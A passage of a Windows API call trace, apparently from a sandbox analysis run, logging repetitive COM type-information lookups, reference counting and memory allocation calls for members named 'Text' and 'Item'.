(This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.687] GetCurrentProcess () returned 0xffffffffffffffff [0045.687] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.687] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.687] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.687] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.687] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.687] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.687] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.687] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.687] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.687] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.687] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.687] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x3b03d7e | out: ppTypeAttr=0x204a18, pDummy=0x3b03d7e*=0x4) returned 0x0 [0045.687] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.687] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.687] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.687] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.687] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.687] GetCurrentProcess () returned 0xffffffffffffffff [0045.687] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.687] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.687] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.687] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.688] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.688] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.688] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.688] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.688] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.688] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.688] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.688] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.688] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.688] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.688] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.688] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.688] IUnknown:Release (This=0x8137308) returned 0x1 [0045.688] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440*="") returned 0x0 [0045.688] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.688] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.689] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.689] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.689] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.689] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.689] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.689] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.689] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x3b10000 | out: ppTypeAttr=0x204508, pDummy=0x3b10000*=0x4) returned 0x0 [0045.689] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.689] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.689] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.689] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.689] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.689] GetCurrentProcess () returned 0xffffffffffffffff [0045.689] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.689] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.689] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.689] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.689] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0045.689] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.689] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.689] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.690] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.690] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.690] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.690] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.690] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.690] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.690] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.690] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.690] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.690] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.690] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.691] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.691] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.691] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.691] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.691] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.691] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.691] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.691] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.691] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.691] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.691] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.691] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.691] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.691] GetCurrentProcess () returned 0xffffffffffffffff [0045.691] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.691] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.691] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.691] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.692] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.692] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.692] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.692] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.692] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.692] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.692] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.692] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x3b10ba0 | out: ppTypeAttr=0x204948, pDummy=0x3b10ba0*=0x4) returned 0x0 [0045.692] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.692] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.692] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.692] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.692] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.692] GetCurrentProcess () returned 0xffffffffffffffff [0045.692] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.692] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.692] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.692] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.692] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.692] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.692] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.692] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.692] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.693] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.693] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.693] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.693] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.693] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.693] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.693] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.693] IUnknown:Release (This=0x8137308) returned 0x1 [0045.693] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.693] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.693] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.693] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.693] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.693] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.693] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.693] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.693] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.693] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x3b10e20 | out: ppTypeAttr=0x204738, pDummy=0x3b10e20*=0x4) returned 0x0 [0045.693] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.693] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.694] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.694] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.694] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.694] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.694] GetCurrentProcess () returned 0xffffffffffffffff [0045.694] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.694] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.694] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.694] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.694] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.694] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.694] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.694] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.694] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.694] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.694] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.694] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x3b11360 | out: ppTypeAttr=0x204a18, pDummy=0x3b11360*=0x3b0120e) returned 0x0 [0045.694] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.694] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.694] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.694] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.694] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.694] GetCurrentProcess () returned 0xffffffffffffffff [0045.694] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.694] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.694] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.695] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.695] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.695] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.695] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.695] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.695] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.695] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.695] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.695] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.695] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.695] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.695] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.695] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.695] IUnknown:Release (This=0x8137308) returned 0x1 [0045.695] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440*="") returned 0x0 [0045.695] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.696] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.696] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.696] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.696] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.696] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.696] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.696] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.696] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x3b11420 | out: ppTypeAttr=0x204508, pDummy=0x3b11420*=0x4) returned 0x0 [0045.696] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.696] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.696] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.696] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.696] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.696] GetCurrentProcess () returned 0xffffffffffffffff [0045.696] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.696] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.696] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.696] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.696] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0045.696] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.696] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.697] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.697] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.697] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.697] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.697] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.697] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.697] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.697] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.697] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.697] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: 